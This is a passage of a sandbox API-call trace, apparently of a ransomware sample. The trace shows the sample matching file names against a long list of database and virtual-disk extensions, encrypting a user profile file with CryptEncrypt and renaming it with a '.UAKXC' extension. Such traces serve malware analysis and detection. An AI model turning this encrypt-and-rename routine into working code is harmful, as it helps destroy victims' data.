(lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accdt") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accft") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".adb") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ade") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".adf") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".adp") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".arc") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ora") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".alf") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ask") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".btr") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".bdf") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".cat") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".cdb") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ckp") returned 0x0 [0146.010] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".cma") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".cpd") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dacpac") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dad") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dadiagrams") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".daschema") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".db") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".db-shm") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".db-wal") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".db3") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbc") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbf") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbs") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbt") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbv") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dbx") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dcb") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dct") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dcx") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ddl") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dlis") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dp1") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dqy") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dsk") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dsn") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dtsx") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".dxl") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".eco") returned 0x0 [0146.011] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ecx") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".edb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".epim") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".exb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fcd") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fdb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fic") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fmp") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fmp12") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fmpsl") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fol") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fp3") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fp4") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fp5") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fp7") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fpt") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".frm") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".gdb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".grdb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".gwi") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".hdb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".his") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ib") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".idb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ihx") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".itdb") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".itw") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".jet") returned 0x0 [0146.012] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".jtx") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".kdb") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".kexi") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".kexic") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".kexis") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".lgc") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".lwx") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".maf") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".maq") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mar") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mas") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mav") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mdb") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mdf") returned 0x0 [0146.013] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mpd") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mrg") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mud") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mwb") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".myd") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ndf") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nnt") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nrmlib") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ns2") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ns3") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".ns4") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nsf") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nv") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nv2") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nwdb") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nyf") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".odb") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".oqy") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".orx") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".owc") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".p96") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".p97") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".pan") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".pdb") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".pdm") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".pnz") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".qry") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".qvd") returned 0x0 [0146.014] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rbf") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rctd") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rod") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rodx") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rpd") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".rsd") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sas7bdat") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sbf") returned 0x0 [0146.015] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".scx") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sdb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sdc") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sdf") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sis") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".spq") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sql") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sqlite") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sqlite3") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".sqlitedb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".te") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".temx") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".tmd") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".tps") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".trc") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".trm") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".udb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".udl") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".usr") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".v12") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vis") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vpd") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vvv") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".wdb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".wmdb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".wrk") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".xdb") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".xld") returned 0x0 [0146.016] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".xmlff") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".abcddb") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".abs") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".abx") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".accdw") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".adn") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".db2") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".fm5") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".hjt") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".icg") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".icr") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".kdb") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".lut") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".maw") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mdn") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".mdt") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vdi") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vhd") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmdk") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".pvm") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmem") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmsn") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmsd") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".nvram") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmx") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".raw") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".qcow2") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".subvol") returned 0x0 [0146.017] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".bin") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vsv") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".avhd") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmrs") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vhdx") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".avdx") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".vmcx") returned 0x0 [0146.018] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT", lpSrch=".iso") returned 0x0 [0146.018] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.018] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0146.947] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0146.947] SetEndOfFile (hFile=0x6f0) returned 1 [0146.948] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.948] ReadFile (in: hFile=0x6f0, lpBuffer=0x4100000, nNumberOfBytesToRead=0xc0000, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0xc0000, lpOverlapped=0x0) returned 1 [0147.552] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfff40000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.552] WriteFile (in: hFile=0x6f0, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0xc0000, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0xc0000, lpOverlapped=0x0) returned 1 [0147.556] CloseHandle (hObject=0x6f0) returned 1 [0147.654] GetProcessHeap () returned 0xea0000 [0147.654] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xf29490 [0147.654] lstrcpyW (in: lpString1=0xf29490, lpString2="C:\\Users\\Default\\NTUSER.DAT" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0147.654] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT.UAKXC" [0147.654] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat.uakxc")) returned 1 [0147.655] GetProcessHeap () returned 0xea0000 [0147.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf29490 | out: hHeap=0xea0000) returned 1 [0147.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef16e0 | out: hHeap=0xea0000) returned 1 [0147.655] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2ce0 | out: hHeap=0xea0000) returned 1 [0147.655] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0147.655] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0147.655] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0147.656] GetFileAttributesW (lpFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini")) returned 0x2026 [0147.656] CreateFileW (lpFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.656] GetLastError () returned 0x0 [0147.656] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=20) returned 1 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".4dd") returned 0x0 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".4dl") returned 0x0 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accdb") returned 0x0 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accdc") returned 0x0 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accde") returned 0x0 [0147.656] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accdr") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accdt") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accft") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".adb") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ade") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".adf") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".adp") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".arc") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ora") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".alf") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ask") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".btr") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".bdf") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".cat") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".cdb") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ckp") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".cma") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".cpd") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dacpac") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dad") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dadiagrams") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".daschema") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".db") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".db-shm") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".db-wal") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".db3") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbc") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbf") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbs") 